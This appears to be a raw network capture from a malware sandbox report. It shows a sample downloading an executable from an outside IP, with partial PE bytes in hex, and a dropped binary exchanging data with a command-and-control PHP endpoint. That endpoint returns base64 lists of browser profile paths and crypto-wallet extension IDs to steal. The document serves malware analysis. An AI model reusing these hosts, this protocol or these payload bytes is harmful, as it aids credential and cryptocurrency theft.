                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      2192.168.2.449732185.172.128.59804312C:\Users\user\Desktop\TNQTc6Qmkg.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Apr 27, 2024 02:19:00.326092958 CEST181OUTGET /syncUpd.exe HTTP/1.1
                                                                                                                                                      Host: 185.172.128.59
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                      Apr 27, 2024 02:19:00.497540951 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:19:00 GMT
                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                      Last-Modified: Sat, 27 Apr 2024 00:15:01 GMT
                                                                                                                                                      ETag: "47e00-61708e94e86ef"
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Content-Length: 294400
                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0f 14 d4 08 4b 75 ba 5b 4b 75 ba 5b 4b 75 ba 5b 46 27 65 5b 55 75 ba 5b 46 27 5a 5b c3 75 ba 5b 46 27 5b 5b 64 75 ba 5b 42 0d 29 5b 48 75 ba 5b 4b 75 bb 5b 3b 75 ba 5b fe eb 5f 5b 4a 75 ba 5b 46 27 61 5b 4a 75 ba 5b fe eb 64 5b 4a 75 ba 5b 52 69 63 68 4b 75 ba 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 75 f1 78 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 1a 01 00 00 3a c2 03 00 00 00 00 02 41 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 c3 03 00 04 00 00 5d 8c 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Ku[Ku[Ku[F'e[Uu[F'Z[u[F'[[du[B)[Hu[Ku[;u[_[Ju[F'a[Ju[d[Ju[RichKu[PELuxd:A0@](h`\28@0.text `.rdatal0n@@.dataKr@.rsrchj@@.reloc\`h@B [TRUNCATED]
                                                                                                                                                      Apr 27, 2024 02:19:00.497560978 CEST1289INData Raw: 41 00 e8 5f 27 00 00 59 c3 b9 d4 da 01 04 e8 c8 02 00 00 68 7f 28 41 00 e8 49 27 00 00 59 c3 b9 c0 da 01 04 e8 1f 03 00 00 68 75 28 41 00 e8 33 27 00 00 59 c3 6a 00 b9 c8 da 01 04 e8 15 01 00 00 c3 6a 00 b9 bc da 01 04 e8 08 01 00 00 c3 6a 00 b9
                                                                                                                                                      Data Ascii: A_'Yh(AI'Yhu(A3'YjjjjUQQL$$X]E]UQQQQ$ ]EYY]UVEPUQA^]QAUVEtV
                                                                                                                                                      Apr 27, 2024 02:19:00.497652054 CEST1289INData Raw: 00 53 53 ff 15 30 30 41 00 8d 45 c8 50 ff 15 14 30 41 00 53 53 53 ff 15 2c 30 41 00 8d 85 b0 fb ff ff 50 53 ff 15 a0 30 41 00 53 53 ff 15 9c 30 41 00 8d 45 c4 50 53 8d 45 b0 50 53 ff 15 48 30 41 00 53 53 53 53 ff 15 60 30 41 00 8b 45 f8 8b 0d b0
                                                                                                                                                      Data Ascii: SS00AEP0ASSS,0APS0ASS0AEPSEPSH0ASSSS`0AE+}uS0AEEE]EEEEEEMEEEEMU3E3U:UGaUNt]MuE~_^[]V5W=t
                                                                                                                                                      Apr 27, 2024 02:19:00.497745037 CEST1289INData Raw: 55 b8 2b e8 9d 09 f7 65 f0 8b 45 f0 81 6d f4 75 6b 6d 57 b8 65 7f f8 62 f7 65 d0 8b 45 d0 81 6d f0 1a 01 37 1b 81 45 c8 65 b1 36 08 81 45 dc f6 3e 79 75 81 45 d8 02 56 5f 47 81 45 c0 d6 bd 17 3f 81 45 e4 12 5f 9d 36 b8 7b ea 48 5f f7 65 dc 8b 45
                                                                                                                                                      Data Ascii: U+eEmukmWebeEm7Ee6E>yuEV_GE?E_6{H_eEEMWcm%>mzmmRQ6keEE%v;QeEQKeE)#eEtUeEeED7eEmI'D eEyuSeEoeEm
                                                                                                                                                      Apr 27, 2024 02:19:00.497833014 CEST1289INData Raw: ff ff 33 c0 3b c6 5f 1b c0 f7 d8 5e 5d c2 08 00 8b cf e8 31 00 00 00 cc 55 8b ec 83 7d 08 00 57 8b f9 74 1d e8 49 00 00 00 39 45 08 72 13 8b cf e8 3d 00 00 00 03 47 10 3b 45 08 76 04 b0 01 eb 02 32 c0 5f 5d c2 04 00 68 9c 88 41 00 e8 c0 03 00 00
                                                                                                                                                      Data Ascii: 3;_^]1U}WtI9Er=G;Ev2_]hAhAU]faayrUQEPN3B;HF]P(AUSVuWe};su'3EOu;vW
                                                                                                                                                      Apr 27, 2024 02:19:00.497939110 CEST1289INData Raw: e7 03 73 11 f3 0f 7e 0e 83 e9 08 8d 76 08 66 0f d6 0f 8d 7f 08 f7 c6 07 00 00 00 74 63 0f ba e6 03 0f 83 b2 00 00 00 66 0f 6f 4e f4 8d 76 f4 66 0f 6f 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 0c 66
                                                                                                                                                      Data Ascii: s~vftcfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}vfoNvIfo^0foF fon0v00fof:ffof:fGfof:fo 0}vVfoNvfo^0foF fo
                                                                                                                                                      Apr 27, 2024 02:19:00.498017073 CEST1289INData Raw: 0f 7f 7f 70 8d b6 80 00 00 00 8d bf 80 00 00 00 4a 75 a3 85 c9 74 4f 8b d1 c1 ea 04 85 d2 74 17 8d 9b 00 00 00 00 66 0f 6f 06 66 0f 7f 07 8d 76 10 8d 7f 10 4a 75 ef 83 e1 0f 74 2a 8b c1 c1 e9 02 74 0d 8b 16 89 17 8d 76 04 8d 7f 04 49 75 f3 8b c8
                                                                                                                                                      Data Ascii: pJutOtfofvJut*tvIutFGIuX^_$++QtFGIutvHuYAAQ AAUEu$#3]@]U
                                                                                                                                                      Apr 27, 2024 02:19:00.498099089 CEST1289INData Raw: 00 54 2e 40 00 4c 2e 40 00 8b 44 8e e4 89 44 8f e4 8b 44 8e e8 89 44 8f e8 8b 44 8e ec 89 44 8f ec 8b 44 8e f0 89 44 8f f0 8b 44 8e f4 89 44 8f f4 8b 44 8e f8 89 44 8f f8 8b 44 8e fc 89 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 98 2e 40
                                                                                                                                                      Data Ascii: T.@L.@DDDDDDDDDDDDDD$.@.@.@.@.@D$^_D$^_FGD$^_IFGFGD$^_t1|9u$r$40@$/@Ir+$8/@$
                                                                                                                                                      Apr 27, 2024 02:19:00.498167992 CEST1289INData Raw: 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 cc cc cc cc cc 57 8b 7c 24 08 eb 6e 8d a4 24 00 00 00 00 8b ff 8b 4c 24 04 57 f7 c1 03 00 00 00 74 13 8a 01 83 c1 01 84 c0 74 3d f7 c1 03 00 00 00 75 ef 8b ff 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2
                                                                                                                                                      Data Ascii: $+AL$+W|$n$L$Wtt=u~3tAt#tttyyyyL$ttfu~3tt4t'ttD$_fD
                                                                                                                                                      Apr 27, 2024 02:19:00.498302937 CEST1289INData Raw: 08 8b 7d e4 56 e8 2a 1c 00 00 59 c3 55 8b ec 6a 40 ff 75 0c ff 75 08 e8 2c ff ff ff 83 c4 0c 5d c3 6a 0c 68 20 8f 41 00 e8 2e 28 00 00 33 db 89 5d e4 33 c0 8b 7d 08 85 ff 0f 95 c0 85 c0 75 18 e8 7b 15 00 00 c7 00 16 00 00 00 e8 01 15 00 00 83 c8
                                                                                                                                                      Data Ascii: }V*YUj@uu,]jh A.(3]3}u{39Et}WXY!]G@uqWYttC@A@$u)ttC@AB$to]u%W*
                                                                                                                                                      Apr 27, 2024 02:19:00.669612885 CEST1289INData Raw: 50 e8 90 10 00 00 59 33 c0 eb 41 03 c0 50 e8 ac 25 00 00 89 06 59 85 c0 74 ed ff 75 fc 50 6a ff ff 75 08 6a 00 53 ff 15 58 30 41 00 85 c0 75 19 ff 15 5c 30 41 00 50 e8 5a 10 00 00 ff 36 e8 c8 10 00 00 83 26 00 59 eb bd 33 c0 40 5e 5b 8b e5 5d c3
                                                                                                                                                      Data Ascii: PY3AP%YtuPjujSX0Au\0APZ6&Y3@^[]UQEPh@Aj0Ath@Aul0Atu]UuYu0AUQu&RYhjjjMjjj>U=@Ath@ASYtu


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      3192.168.2.449733185.172.128.76806808C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Apr 27, 2024 02:19:02.778872967 CEST416OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDB
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 215
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 32 45 31 42 46 37 46 41 32 32 34 37 39 36 39 32 32 37 39 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 2d 2d 0d 0a
                                                                                                                                                      Data Ascii: ------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="hwid"22E1BF7FA224796922796------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="build"default10------DHCAAEBKEGHJKEBFHJDB--
                                                                                                                                                      Apr 27, 2024 02:19:03.277791023 CEST347INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:19:03 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 152
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Data Raw: 4e 32 4d 33 4f 54 67 30 5a 44 59 79 4e 6a 67 33 59 54 51 79 59 32 51 35 4e 54 45 35 59 32 45 32 4f 57 4a 6d 59 7a 59 35 5a 57 4d 31 4f 44 59 33 4f 44 41 30 59 6a 4d 35 4d 47 49 31 4d 7a 42 68 4e 54 63 77 4e 6d 56 68 4e 7a 6b 77 4f 44 68 6a 4d 32 51 7a 4e 6d 49 31 4e 6d 5a 6a 59 6a 63 33 66 47 68 6c 63 6a 64 6f 4e 44 68 79 66 47 56 79 4e 47 67 30 5a 54 68 79 4e 43 35 6d 61 57 78 6c 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d
                                                                                                                                                      Data Ascii: N2M3OTg0ZDYyNjg3YTQyY2Q5NTE5Y2E2OWJmYzY5ZWM1ODY3ODA0YjM5MGI1MzBhNTcwNmVhNzkwODhjM2QzNmI1NmZjYjc3fGhlcjdoNDhyfGVyNGg0ZThyNC5maWxlfDF8MHwxfDF8MXwxfDF8MXw=
                                                                                                                                                      Apr 27, 2024 02:19:03.279793978 CEST469OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJ
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 268
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 2d 2d 0d 0a
                                                                                                                                                      Data Ascii: ------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="message"browsers------DAFIEHIEGDHIDGDGHDHJ--
                                                                                                                                                      Apr 27, 2024 02:19:03.561563969 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:19:03 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 1520
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED]
                                                                                                                                                      Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxV [TRUNCATED]
                                                                                                                                                      Apr 27, 2024 02:19:03.561602116 CEST427INData Raw: 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c 66 45 39
                                                                                                                                                      Data Ascii: 21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZCBQ
                                                                                                                                                      Apr 27, 2024 02:19:03.564460039 CEST468OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDB
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 267
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 2d 2d 0d 0a
                                                                                                                                                      Data Ascii: ------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="message"plugins------DHCAAEBKEGHJKEBFHJDB--
                                                                                                                                                      Apr 27, 2024 02:19:03.852745056 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:19:03 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 5416
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                                      Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdh [TRUNCATED]
                                                                                                                                                      Apr 27, 2024 02:19:03.852807045 CEST1289INData Raw: 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64
                                                                                                                                                      Data Ascii: GxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBk
                                                                                                                                                      Apr 27, 2024 02:19:03.853064060 CEST1289INData Raw: 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c
                                                                                                                                                      Data Ascii: FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8M
                                                                                                                                                      Apr 27, 2024 02:19:03.853147030 CEST1289INData Raw: 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62
                                                                                                                                                      Data Ascii: wYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY2
                                                                                                                                                      Apr 27, 2024 02:19:03.853303909 CEST456INData Raw: 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57
                                                                                                                                                      Data Ascii: YmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHx
